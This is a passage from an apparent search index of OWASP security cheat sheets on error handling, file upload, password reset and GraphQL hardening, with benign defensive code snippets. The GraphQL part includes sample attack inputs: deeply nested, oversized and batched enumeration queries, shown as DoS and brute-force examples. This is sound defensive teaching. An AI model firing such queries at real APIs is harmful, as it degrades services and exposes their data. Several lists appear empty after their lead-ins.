Task.FromResult(response);\n}\n}\n}\n}\n

Registration of both handlers in the application WebApiConfig.cs file:

using MyProject.Security;\nusing System.Web.Http;\nusing System.Web.Http.ExceptionHandling;\n\nnamespace MyProject\n{\npublic static class WebApiConfig\n{\npublic static void Register(HttpConfiguration config)\n{\n//Register global error logging and handling handlers in first\nconfig.Services.Replace(typeof(IExceptionLogger), new GlobalErrorLogger());\nconfig.Services.Replace(typeof(IExceptionHandler), new GlobalErrorHandler());\n//Rest of the configuration\n//...\n}\n}\n}\n

Set the customErrors section in the Web.config file within the <system.web> node as follows.

<configuration>\n...\n<system.web>\n<customErrors mode=\"RemoteOnly\"\ndefaultRedirect=\"~/ErrorPages/Oops.aspx\" />\n...\n</system.web>\n</configuration>\n

References:

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#sources-of-the-prototype","title":"Sources of the prototype","text":"

The source code of all the sandbox projects created to find the right setup to use is stored in this GitHub repository.

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#appendix-http-errors","title":"Appendix HTTP Errors","text":"

A reference for HTTP errors can be found in RFC 2616. Using error messages that do not provide implementation details is important to avoid information leakage. In general, consider using 4xx error codes for requests that are due to an error on the part of the HTTP client (e.g. unauthorized access, request body too large) and use 5xx to indicate errors that are triggered on the server side, due to an unforeseen bug. Ensure that applications are monitored for 5xx errors, which are a good indication of the application failing for some sets of inputs.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html","title":"File Upload Cheat Sheet","text":""},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#introduction","title":"Introduction","text":"

File upload is becoming an increasingly essential part of any application, where the user is able to upload their photo, their CV, or a video showcasing a project they are working on. The application should be able to fend off bogus and malicious files in order to keep the application and its users safe.

In short, the following principles should be followed to reach a secure file upload implementation:

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#file-upload-threats","title":"File Upload Threats","text":"

In order to assess and know exactly what controls to implement, it is essential to know what you are facing so you can protect your assets. The following sections will hopefully showcase the risks accompanying the file upload functionality.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#malicious-files","title":"Malicious Files","text":"

The attacker delivers a file for malicious intent, such as:

  1. Exploit vulnerabilities in the file parser or processing module (e.g. ImageTrick Exploit, XXE)
  2. Use the file for phishing (e.g. careers form)
  3. Send ZIP bombs, XML bombs (otherwise known as billion laughs attack), or simply huge files in a way to fill the server storage which hinders and damages the server's availability
  4. Overwrite an existing file on the system
  5. Client-side active content (XSS, CSRF, etc.) that could endanger other users if the files are publicly retrievable.
"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#public-file-retrieval","title":"Public File Retrieval","text":"

If the uploaded file is publicly retrievable, additional threats need to be addressed:

  1. Public disclosure of other files
  2. Initiate a DoS attack by requesting lots of files. Requests are small, yet responses are much larger
  3. File content that could be deemed as illegal, offensive, or dangerous (e.g. personal data, copyrighted data, etc.) which will make you a host for such malicious files.
"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#file-upload-protection","title":"File Upload Protection","text":"

There is no silver bullet for validating user content. Implementing a defense-in-depth approach is key to making the upload process harder and more locked down to the needs and requirements of the service. Implementing multiple techniques is recommended, as no single technique is enough to secure the service.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#extension-validation","title":"Extension Validation","text":"

Ensure that the validation occurs after decoding the file name, and that a proper filter is set in place in order to avoid certain known bypasses, such as the following:

Refer to the Input Validation CS to properly parse and process the extension.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#list-allowed-extensions","title":"List Allowed Extensions","text":"

Ensure the usage of business-critical extensions only, without allowing any type of non-required extensions. For example, if the system requires:

Based on the needs of the application, ensure the least harmful and the lowest risk file types to be used.
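
A hedged sketch of such an allow-list check follows; the class name and the list of extensions are examples only and should reflect your own business needs.

using System;\nusing System.IO;\nusing System.Linq;\n\npublic static class ExtensionValidator\n{\n// Illustrative allow list of business-required extensions (example values only)\nprivate static readonly string[] AllowedExtensions = { \".jpg\", \".jpeg\", \".png\", \".pdf\" };\n\npublic static bool HasAllowedExtension(string fileName)\n{\n// Path.GetExtension works on the decoded file name and includes the leading dot\nstring extension = Path.GetExtension(fileName);\nreturn !string.IsNullOrEmpty(extension) &&\nAllowedExtensions.Contains(extension, StringComparer.OrdinalIgnoreCase);\n}\n}\n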

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#block-extensions","title":"Block Extensions","text":"

Identify potentially harmful file types and block extensions that you regard as harmful to your service.

Please be aware that blocking specific extensions is a weak protection method on its own. The Unrestricted File Upload vulnerability article describes how attackers may attempt to bypass such a check.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#content-type-validation","title":"Content-Type Validation","text":"

The Content-Type for uploaded files is provided by the user, and as such cannot be trusted, as it is trivial to spoof. Although it should not be relied upon for security, it provides a quick check to prevent users from unintentionally uploading files with the incorrect type.

Other than defining the extension of the uploaded file, its MIME-type can be checked for a quick protection against simple file upload attacks.

This can be done preferably in an allow list approach; otherwise, this can be done in a block list approach.
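
As a hedged ASP.NET Core sketch of the allow-list approach, the declared content type can be compared against the expected values; remember that this header is user controlled, so it is only a quick first check.

using System;\nusing System.Collections.Generic;\nusing Microsoft.AspNetCore.Http;\n\npublic static class ContentTypeValidator\n{\n// Illustrative allow list (example values only); the Content-Type header is easy to spoof\nprivate static readonly HashSet<string> AllowedContentTypes =\nnew HashSet<string>(StringComparer.OrdinalIgnoreCase) { \"image/jpeg\", \"image/png\", \"application/pdf\" };\n\npublic static bool HasAllowedContentType(IFormFile file)\n{\nreturn file != null && AllowedContentTypes.Contains(file.ContentType);\n}\n}\n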

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#file-signature-validation","title":"File Signature Validation","text":"

In conjunction with content-type validation, the file's signature can be checked and verified against the expected file type.

This should not be used on its own, as bypassing it is pretty common and easy.
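
A hedged sketch of a signature check for one file type is shown below; the PNG signature bytes are well known, and signatures for other types would be taken from a reference list. It assumes a seekable stream and must be combined with the other controls in this cheat sheet.

using System.IO;\nusing System.Linq;\n\npublic static class FileSignatureValidator\n{\n// PNG files start with these 8 bytes; other types have their own well-known signatures\nprivate static readonly byte[] PngSignature = { 0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A };\n\npublic static bool LooksLikePng(Stream fileStream)\n{\nbyte[] header = new byte[PngSignature.Length];\nint read = fileStream.Read(header, 0, header.Length);\nfileStream.Position = 0; // rewind so later processing sees the whole file (assumes a seekable stream)\nreturn read == PngSignature.Length && header.SequenceEqual(PngSignature);\n}\n}\n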

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#filename-sanitization","title":"Filename Sanitization","text":"

Filenames can endanger the system in multiple ways, either by using unacceptable characters, or by using special and restricted filenames. For Windows, refer to the following MSDN guide. For a wider overview of different filesystems and how they treat files, refer to Wikipedia's Filename page.

In order to avoid the above-mentioned threats, creating a random string as a filename, such as generating a UUID/GUID, is essential. If the filename is required by the business needs, proper input validation should be done for client-side (e.g. active content that results in XSS and CSRF attacks) and back-end side (e.g. special file overwrite or creation) attack vectors. Filename length limits should be taken into consideration based on the system storing the files, as each system has its own filename length limit. If user filenames are required, consider implementing the following:
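
Returning to the random-name recommendation above, a minimal sketch of generating such a storage name while keeping only an already validated extension might look like this; the helper name is illustrative.

using System;\nusing System.IO;\n\npublic static class StorageNameGenerator\n{\n// Illustrative: store the upload under a random name, keeping only a validated extension\npublic static string BuildStorageFileName(string originalFileName)\n{\n// Assumes the extension has already passed the allow-list check described above\nstring extension = Path.GetExtension(originalFileName);\nreturn Guid.NewGuid().ToString(\"N\") + extension;\n}\n}\n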

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#file-content-validation","title":"File Content Validation","text":"

As mentioned in the Public File Retrieval section, file content can contain malicious, inappropriate, or illegal data.

Based on the expected type, special file content validation can be applied:

The File Upload service should allow users to report illegal content, and copyright owners to report abuse.

If there are enough resources, manual file review should be conducted in a sandboxed environment before releasing the files to the public.

Adding some automation to the review could be helpful, but this is a difficult process and should be well studied before its usage. Some services (e.g. VirusTotal) provide APIs to scan files against well-known malicious file hashes. Some frameworks can check and validate the raw content type against predefined file types, such as in the ASP.NET Drawing Library. Beware of data leakage threats and information gathering by public services.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#file-storage-location","title":"File Storage Location","text":"

The location where the files should be stored must be chosen based on security and business requirements. The following points are set by security priority, and are inclusive:

  1. Store the files on a different host, which allows for complete segregation of duties between the application serving the user, and the host handling file uploads and their storage.
  2. Store the files outside the webroot, where only administrative access is allowed.
  3. Store the files inside the webroot, and set them with write permissions only.
  4. If read access is required, setting proper controls is a must (e.g. internal IP, authorized user, etc.)

Storing files in databases is one additional technique, though it should be studied carefully. It is sometimes used to simplify automatic backup processes, avoid certain file-system attacks, and sidestep permissions issues. In return, it can introduce performance issues (in some cases), adds storage considerations for the database and its backups, and opens the door to SQL injection attacks. This is advised only when a DBA is on the team and this process shows itself to be an improvement on storing the files on the file-system.

Some files are emailed or processed once they are uploaded, and are not stored on the server. It is essential to apply the security measures discussed in this cheat sheet before performing any actions on them.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#user-permissions","title":"User Permissions","text":"

Before any file upload service is accessed, proper validation should occur on two levels for the user uploading a file:

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#filesystem-permissions","title":"Filesystem Permissions","text":"

Set the files permissions on the principle of least privilege.

Files should be stored in a way that ensures:

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#upload-and-download-limits","title":"Upload and Download Limits","text":"

The application should set proper size limits for the upload service in order to protect the file storage capacity. If the system is going to extract the files or process them, the file size limit should be considered after file decompression is conducted and by using secure methods to calculate zip files size. For more on this, see how to Safely extract files from ZipInputStream, Java's input stream to handle ZIP files.
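
As a hedged ASP.NET Core sketch, a per-endpoint size limit can be applied with the RequestSizeLimit attribute; the 10 MB value below is an assumption and should be set from your own business requirements.

using Microsoft.AspNetCore.Http;\nusing Microsoft.AspNetCore.Mvc;\n\n// Illustrative: cap this upload endpoint at 10 MB (value is an assumption)\n[HttpPost]\n[RequestSizeLimit(10 * 1024 * 1024)]\npublic IActionResult Upload(IFormFile file)\n{\n// ...validate extension, content type, signature and content before storing the file\nreturn Ok();\n}\n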

The application should set proper request limits as well for the download service if available to protect the server from DoS attacks.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#java-code-snippets","title":"Java Code Snippets","text":"

Document Upload Protection repository written by Dominique for certain document types in Java.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html","title":"Forgot Password Cheat Sheet","text":""},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#introduction","title":"Introduction","text":"

In order to implement a proper user management system, systems integrate a Forgot Password service that allows the user to request a password reset.

Even though this functionality looks straightforward and easy to implement, it is a common source of vulnerabilities, such as the renowned user enumeration attack.

The following short guidelines can be used as a quick reference to protect the forgot password service:

This cheat sheet is focused on resetting users passwords. For guidance on resetting multifactor authentication (MFA), see the relevant section in the Multifactor Authentication Cheat Sheet.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#forgot-password-service","title":"Forgot Password Service","text":"

The password reset process can be broken into two main steps, detailed in the following sections.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#forgot-password-request","title":"Forgot Password Request","text":"

When a user uses the forgot password service and inputs their username or email, the below should be followed to implement a secure process:

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#user-resets-password","title":"User Resets Password","text":"

Once the user has proved their identity by providing the token (sent via an email) or code (sent via SMS or other mechanisms), they should reset their password to a new secure one. In order to secure this step, the measures that should be taken are:

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#methods","title":"Methods","text":"

In order to allow a user to request a password reset, you will need to have some way to identify the user, or a means to reach out to them through a side-channel.

This can be done through any of the following methods:

These methods can be used together to provide a greater degree of assurance that the user is who they claim to be. No matter what, you must ensure that a user always has a way to recover their account, even if that involves contacting the support team and proving their identity to staff.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#general-security-practices","title":"General Security Practices","text":"

It is essential to employ good security practices for the reset identifiers (tokens, codes, PINs, etc.). Some points don't apply to the offline methods, such as the lifetime restriction. All tokens and codes should be:

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#url-tokens","title":"URL Tokens","text":"

URL tokens are passed in the query string of the URL, and are typically sent to the user via email. The basic overview of the process is as follows:

  1. Generate a token for the user and attach it to the URL query string (see the token-generation sketch below).
  2. Send this token to the user via email.
  3. Don't rely on the Host header while creating the reset URLs to avoid Host Header Injection attacks. The URL should either be hard-coded, or should be validated against a list of trusted domains.
  4. Ensure that the URL is using HTTPS.
  5. The user receives the email, and browses to the URL with the attached token.
  6. Ensure that the reset password page adds the Referrer Policy tag with the noreferrer value in order to avoid referrer leakage.
  7. Implement appropriate protection to prevent users from brute-forcing tokens in the URL, such as rate limiting.
  8. If required, perform any additional validation steps such as requiring the user to answer security questions.
  9. Let the user create a new password and confirm it. Ensure that the same password policy used elsewhere in the application is applied.

Note: URL tokens can follow the same behavior as PINs by creating a restricted session from the token. The decision should be based on the needs and the expertise of the developer.
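
The snippet below is a minimal sketch of the token-generation step, assuming a SecureRandom-based token and a hard-coded base URL; the class name, URL, and token length are illustrative assumptions:

import java.security.SecureRandom;\nimport java.util.Base64;\n\npublic class ResetTokenGenerator {\n\nprivate static final SecureRandom RANDOM = new SecureRandom();\n\n//Hard-coded base URL to avoid relying on the Host header (illustrative value)\nprivate static final String RESET_BASE_URL = \"https://example.com/reset-password\";\n\n/**\n * Generate an unpredictable single-use token and build the reset URL\n */\npublic static String buildResetUrl() {\nbyte[] bytes = new byte[32]; //256 bits of entropy\nRANDOM.nextBytes(bytes);\nString token = Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);\n//The token must also be stored server-side with an expiry before the email is sent\nreturn RESET_BASE_URL + \"?token=\" + token;\n}\n}\n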

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#pins","title":"PINs","text":"

PINs are numbers (between 6 and 12 digits) that are sent to the user through a side-channel such as SMS.

  1. Generate a PIN (see the sketch below).
  2. Send it to the user via SMS or another mechanism.
  3. Break the PIN up with spaces to make it easier for the user to read and enter.
  4. The user then enters the PIN along with their username on the password reset page.
  5. Create a limited session from that PIN that only permits the user to reset their password.
  6. Let the user create a new password and confirm it. Ensure that the same password policy used elsewhere in the application is applied.
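
The snippet below is a minimal sketch of steps 1 and 3, assuming a 6-digit PIN generated with SecureRandom; the class name and PIN length are illustrative assumptions:

import java.security.SecureRandom;\n\npublic class ResetPinGenerator {\n\nprivate static final SecureRandom RANDOM = new SecureRandom();\n\n/**\n * Generate a 6 digit PIN and break it up with a space for readability\n */\npublic static String generatePin() {\nint pin = RANDOM.nextInt(1_000_000); //000000 to 999999\nString digits = String.format(\"%06d\", pin);\n//Store the raw digits server-side with a short expiry and send the formatted value to the user\nreturn digits.substring(0, 3) + \" \" + digits.substring(3);\n}\n}\n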
"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#offline-methods","title":"Offline Methods","text":"

Offline methods differ from other methods by allowing the user to reset their password without requesting a special identifier (such as a token or PIN) from the backend. However, authentication still needs to be conducted by the backend to ensure that the request is legitimate. Offline methods provide a certain identifier either on registration, or when the user wishes to configure it.

These identifiers should be stored offline and in a secure fashion (e.g. password managers), and the backend should properly follow the general security practices. Some implementations are built on hardware OTP tokens, certificates, or any other implementation that could be used inside an enterprise. These are out of scope for this cheat sheet.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#backup-codes","title":"Backup Codes","text":"

Backup codes should be provided to the user upon registration, and the user should store them offline in a secure place (such as their password manager). Some companies that implement this method are Google, GitHub, and Auth0.

While implementing this method, the following practices should be followed:

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#security-questions","title":"Security Questions","text":"

Security questions should not be used as the sole mechanism for resetting passwords due to their answers frequently being easily guessable or obtainable by attackers. However, they can provide an additional layer of security when combined with the other methods discussed in this cheat sheet. If they are used, then ensure that secure questions are chosen as discussed in the Security Questions cheat sheet.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#account-lockout","title":"Account Lockout","text":"

Accounts should not be locked out in response to a forgotten password attack, as this can be used to deny access to users with known usernames. For more details on account lockouts, see the Authentication Cheat Sheet.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html","title":"GraphQL Cheat Sheet","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#introduction","title":"Introduction","text":"

GraphQL is an open source query language originally developed by Facebook that can be used to build APIs as an alternative to REST and SOAP. It has gained popularity since its inception in 2012 because of the native flexibility it offers to those building and calling the API. There are GraphQL servers and clients implemented in various languages. Many companies use GraphQL including GitHub, Credit Karma, Intuit, and PayPal.

This Cheat Sheet provides guidance on the various areas that need to be considered when working with GraphQL:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#common-attacks","title":"Common Attacks","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#best-practices-and-recommendations","title":"Best Practices and Recommendations","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#input-validation","title":"Input Validation","text":"

Adding strict input validation can help protect against injection and DoS. The main design of GraphQL is that the user supplies one or more identifiers and the backend has a number of data fetchers making HTTP, DB, or other calls using the given identifiers. This means that user input will be included in HTTP requests, DB queries, or other requests/calls, which provides an opportunity for injection that could lead to various attacks or DoS.

See the OWASP Cheat Sheets on Input Validation and general injection prevention for full details on how to best perform input validation and prevent injection.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#general-practices","title":"General Practices","text":"

Validate all incoming data to only allow valid values (i.e. allow list).

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#injection-prevention","title":"Injection Prevention","text":"

When handling input meant to be passed to another interpreter (e.g. SQL/NoSQL/ORM, OS, LDAP, XML):

For more information see the below pages:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#process-validation","title":"Process Validation","text":"

When using user input, even if sanitized and/or validated, it should not be used for certain purposes that would give a user control over data flow. For example, do not make an HTTP/resource request to a host that the user supplies (unless there is an absolute business need).
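
The snippet below is a minimal sketch of restricting outbound requests to an allow list of hosts, assuming the set of hosts the backend may call is known in advance; the class name and host values are illustrative assumptions:

import java.net.URI;\nimport java.util.Set;\n\npublic class OutboundRequestValidator {\n\n//Illustrative allow list of the hosts that the backend is permitted to call\nprivate static final Set<String> ALLOWED_HOSTS = Set.of(\"internal-api.example.com\", \"files.example.com\");\n\n/**\n * Reject any target URL whose host is not explicitly allowed\n */\npublic static URI validateTarget(String userSuppliedUrl) {\nURI uri = URI.create(userSuppliedUrl);\nif (uri.getHost() == null || !ALLOWED_HOSTS.contains(uri.getHost().toLowerCase())) {\nthrow new IllegalArgumentException(\"Target host is not allowed !\");\n}\nreturn uri;\n}\n}\n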

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#dos-prevention","title":"DoS Prevention","text":"

DoS is an attack against the availability and stability of the API that can make it slow, unresponsive, or completely unavailable. This CS details several methods to limit the possibility of a DoS attack at the application level and other layers of the tech stack. There is also a CS dedicated to the topic of DoS.

Here are recommendations specific to GraphQL to limit the potential for DoS:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#query-limiting-depth-amount","title":"Query Limiting (Depth & Amount)","text":"

In GraphQL each query has a depth (e.g. nested objects) and each object requested in a query can have an amount specified (e.g. 99999999 of an object). By default these can both be unlimited, which may lead to a DoS. You should set limits on depth and amount to prevent DoS, but this usually requires a small custom implementation as it is not natively supported by GraphQL. See this and this page for more information about these attacks and how to add depth and amount limiting. Adding pagination can also help performance.

APIs using graphql-java can utilize the built-in MaxQueryDepthInstrumentation for depth limiting. APIs using JavaScript can use graphql-depth-limit to implement depth limiting and graphql-input-number to implement amount limiting.
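
For example, a minimal sketch of wiring the depth limit into graphql-java (the factory class name is an assumption and the limit of 10 is illustrative):

import graphql.GraphQL;\nimport graphql.analysis.MaxQueryDepthInstrumentation;\nimport graphql.schema.GraphQLSchema;\n\npublic class DepthLimitedGraphQLFactory {\n\n/**\n * Build a GraphQL instance that rejects queries deeper than 10 levels (illustrative limit)\n */\npublic static GraphQL build(GraphQLSchema schema) {\nreturn GraphQL.newGraphQL(schema)\n.instrumentation(new MaxQueryDepthInstrumentation(10))\n.build();\n}\n}\n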

Here is an example of a GraphQL query with depth N:

query evil {            # Depth: 0\nalbum(id: 42) {       # Depth: 1\nsongs {             # Depth: 2\nalbum {           # Depth: 3\n...             # Depth: ...\nalbum {id: N}   # Depth: N\n}\n}\n}\n}\n

Here is an example of a GraphQL query requesting 99999999 of an object:

query {\nauthor(id: \"abc\") {\nposts(first: 99999999) {\ntitle\n}\n}\n}\n
"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#timeouts","title":"Timeouts","text":"

Adding timeouts can be a simple way to limit how many resources any single request can consume. But timeouts are not always effective since they may not activate until a malicious query has already consumed excessive resources. Timeout requirements will differ by API and data fetching mechanism; there isn't one timeout value that will work across the board.

At the application level, timeouts can be added for queries and resolver functions. This option is usually more effective since the query/resolution can be stopped once the timeout is reached. GraphQL does not natively support query timeouts so custom code is required. See this blog post for more about using timeouts with GraphQL or the two examples below.

JavaScript Timeout Example

Code snippet from this SO answer:

request.incrementResolverCount =  function () {\nvar runTime = Date.now() - startTime;\nif (runTime > 10000) {  // a timeout of 10 seconds\nif (request.logTimeoutError) {\nlogger('ERROR', `Request ${request.uuid} query execution timeout`);\n}\nrequest.logTimeoutError = false;\nthrow 'Query execution has timeout. Field resolution aborted';\n}\nthis.resolverCount++;\n};\n

Java Timeout Example using Instrumentation

public class TimeoutInstrumentation extends SimpleInstrumentation {\n@Override\npublic DataFetcher<?> instrumentDataFetcher(\nDataFetcher<?> dataFetcher, InstrumentationFieldFetchParameters parameters\n) {\nreturn environment ->\nObservable.fromCallable(() -> dataFetcher.get(environment))\n.subscribeOn(Schedulers.computation())\n.timeout(10, TimeUnit.SECONDS)  // timeout of 10 seconds\n.blockingFirst();\n}\n}\n

Infrastructure Timeout

Another option, which is usually easier, is adding a timeout on an HTTP server (Apache/httpd, nginx), reverse proxy, or load balancer. However, infrastructure timeouts are often inaccurate and can be bypassed more easily than application-level ones.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#query-cost-analysis","title":"Query Cost Analysis","text":"

Query cost analysis involves assigning costs to the resolution of fields or types in incoming queries so that the server can reject queries that cost too much to run or will consume too many resources. This is not easy to implement and may not always be necessary, but it is the most thorough approach to preventing DoS. See "Query Cost Analysis" in this blog post for more details on implementing this control.

Apollo recommends:

Before you go ahead and spend a ton of time implementing query cost analysis be certain you need it. Try to crash or slow down your staging API with a nasty query and see how far you get — maybe your API doesn't have these kinds of nested relationships, or maybe it can handle fetching thousands of records at a time perfectly fine and doesn't need query cost analysis!

APIs using graphql-java can utilize the built-in MaxQueryComplexityInstrumentation to enforce max query complexity. APIs using JavaScript can utilize graphql-cost-analysis or graphql-validation-complexity to enforce max query cost.
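
For example, a minimal sketch of wiring a complexity limit into graphql-java (the factory class name is an assumption and the limit of 100 is illustrative):

import graphql.GraphQL;\nimport graphql.analysis.MaxQueryComplexityInstrumentation;\nimport graphql.schema.GraphQLSchema;\n\npublic class ComplexityLimitedGraphQLFactory {\n\n/**\n * Build a GraphQL instance that rejects queries whose total complexity exceeds 100 (illustrative limit)\n */\npublic static GraphQL build(GraphQLSchema schema) {\n//By default each field costs 1, a FieldComplexityCalculator can assign custom per-field costs\nreturn GraphQL.newGraphQL(schema)\n.instrumentation(new MaxQueryComplexityInstrumentation(100))\n.build();\n}\n}\n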

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#rate-limiting","title":"Rate Limiting","text":"

Enforcing rate limiting on a per-IP or per-user basis (for anonymous and unauthorized access) can help limit a single user's ability to spam requests to the service and degrade performance. Ideally this can be done with a WAF, API gateway, or web server (Nginx, Apache/HTTPD) to reduce the effort of adding rate limiting.

Alternatively, you could implement throttling in your own code, which is non-trivial; a conceptual sketch follows below. See "Throttling" here for more about GraphQL-specific rate limiting.
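
The snippet below is a minimal, conceptual sketch of such code-level throttling using a fixed one-minute window per client IP; the class name and limit are illustrative assumptions, and a WAF, API gateway, or dedicated rate-limiting library is usually preferable in practice:

import java.util.Map;\nimport java.util.concurrent.ConcurrentHashMap;\nimport java.util.concurrent.atomic.AtomicInteger;\n\npublic class SimpleRateLimiter {\n\nprivate static final int MAX_REQUESTS_PER_MINUTE = 100; //Illustrative limit\n\nprivate final Map<String, AtomicInteger> counters = new ConcurrentHashMap<>();\nprivate long windowStart = System.currentTimeMillis();\n\n/**\n * Return TRUE if the request from this client IP is allowed in the current fixed window\n */\npublic synchronized boolean allowRequest(String clientIp) {\nlong now = System.currentTimeMillis();\nif (now - windowStart > 60_000) { //Reset the window every minute\ncounters.clear();\nwindowStart = now;\n}\nint count = counters.computeIfAbsent(clientIp, ip -> new AtomicInteger()).incrementAndGet();\nreturn count <= MAX_REQUESTS_PER_MINUTE;\n}\n}\n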

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#server-side-batching-and-caching","title":"Server-side Batching and Caching","text":"

To increase efficiency of a GraphQL API and reduce its resource consumption, the batching and caching technique can be used to prevent making duplicate requests for pieces of data within a small time frame. Facebook's DataLoader tool is one way to implement this.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#system-resource-management","title":"System Resource Management","text":"

Not properly limiting the amount of resources your API can use (e.g. CPU or memory) may compromise your API's responsiveness and availability, leaving it vulnerable to DoS attacks. Some limiting can be done at the operating system level.

On Linux, a combination of Control Groups (cgroups), User Limits (ulimits), and Linux Containers (LXC) can be used.

However, containerization platforms tend to make this task much easier. See the resource limiting section in the Docker Security Cheat Sheet for how to prevent DoS when using containers.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#access-control","title":"Access Control","text":"

To ensure that a GraphQL API has proper access control, do the following:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#general-data-access","title":"General Data Access","text":"

It's commonplace for GraphQL requests to include one or more direct IDs of objects in order to fetch or modify them. For example, a request for a certain picture may include the ID that is actually the primary key in the database for that picture. As with any request, the server must verify that the caller has access to the object they are requesting. But sometimes developers make the mistake of assuming that possession of the object's ID means the caller should have access. Failure to verify the requester's access in this case is called Broken Object Level Authorization, also known as IDOR (Insecure Direct Object Reference).

It's possible for a GraphQL API to support access to objects using their ID even if that is not intended. Sometimes a query object has node or nodes fields (or both), and these can be used to access objects directly by ID. You can check whether your schema has these fields by running this on the command-line (assuming that schema.json contains your GraphQL schema): cat schema.json | jq \".data.__schema.types[] | select(.name==\\\"Query\\\") | .fields[] | .name\" | grep node. Removing these fields from the schema should disable the functionality, but you should always apply proper authorization checks to verify the caller has access to the object they are requesting.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#query-access-data-fetching","title":"Query Access (Data Fetching)","text":"

As part of a GraphQL API there will be various data fields that can be returned. One thing to consider is whether you want different levels of access around these fields. For example, you may only want certain consumers to be able to fetch certain data fields rather than allowing all consumers to retrieve all available fields. This can be done by adding a check in the code to ensure that the requester is allowed to read the field they are trying to fetch.
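
The snippet below is a minimal sketch of such a check for graphql-java, wrapping an existing DataFetcher with a caller-supplied authorization predicate; the class name and the predicate are illustrative assumptions:

import graphql.schema.DataFetcher;\nimport graphql.schema.DataFetchingEnvironment;\n\nimport java.util.function.Predicate;\n\npublic class FieldAccessCheckingFetcher<T> implements DataFetcher<T> {\n\nprivate final DataFetcher<T> delegate;\nprivate final Predicate<DataFetchingEnvironment> isAllowed;\n\npublic FieldAccessCheckingFetcher(DataFetcher<T> delegate, Predicate<DataFetchingEnvironment> isAllowed) {\nthis.delegate = delegate;\nthis.isAllowed = isAllowed;\n}\n\n/**\n * Verify that the caller is allowed to read the field before resolving it\n */\n@Override\npublic T get(DataFetchingEnvironment environment) throws Exception {\nif (!isAllowed.test(environment)) {\nthrow new IllegalAccessException(\"Caller is not authorized to read the field \" + environment.getField().getName());\n}\nreturn delegate.get(environment);\n}\n}\n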

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#mutation-access-data-manipulation","title":"Mutation Access (Data Manipulation)","text":"

GraphQL supports mutation, or manipulation of data, in addition to its most common use case of data fetching. If an API implements/allows mutation then there may need to be access controls put in place to restrict which consumers, if any, can modify data through the API. Setups that require mutation access control would include APIs where only read access is intended for requesters or where only certain parties should be able to modify certain fields.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#batching-attacks","title":"Batching Attacks","text":"

GraphQL supports batching requests, also known as query batching. This lets callers either batch multiple queries or batch requests for multiple object instances in a single network call, which allows for what is called a batching attack. This is a form of brute force attack, specific to GraphQL, that usually allows for faster and less detectable exploits. Here is the most common way to do query batching:

[\n{\nquery: < query 0 >,\nvariables: < variables for query 0 >,\n},\n{\nquery: < query 1 >,\nvariables: < variables for query 1 >,\n},\n{\nquery: < query n >\nvariables: < variables for query n >,\n}\n]\n

And here is an example query of a single batched GraphQL call requesting multiple different instances of the droid object:

query {\ndroid(id: \"2000\") {\nname\n}\nsecond:droid(id: \"2001\") {\nname\n}\nthird:droid(id: \"2002\") {\nname\n}\n}\n

In this case it could be used to enumerate every possible droid object stored on the server in very few network requests, as opposed to a standard REST API, where the requester would need to submit a different network request for every droid ID they want to request. This type of attack can lead to the following issues:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#mitigating-batching-attacks","title":"Mitigating Batching Attacks","text":"

In order to mitigate this type of attack you should put limits on incoming requests at the code level so that they can be applied per request. There are 3 main options:

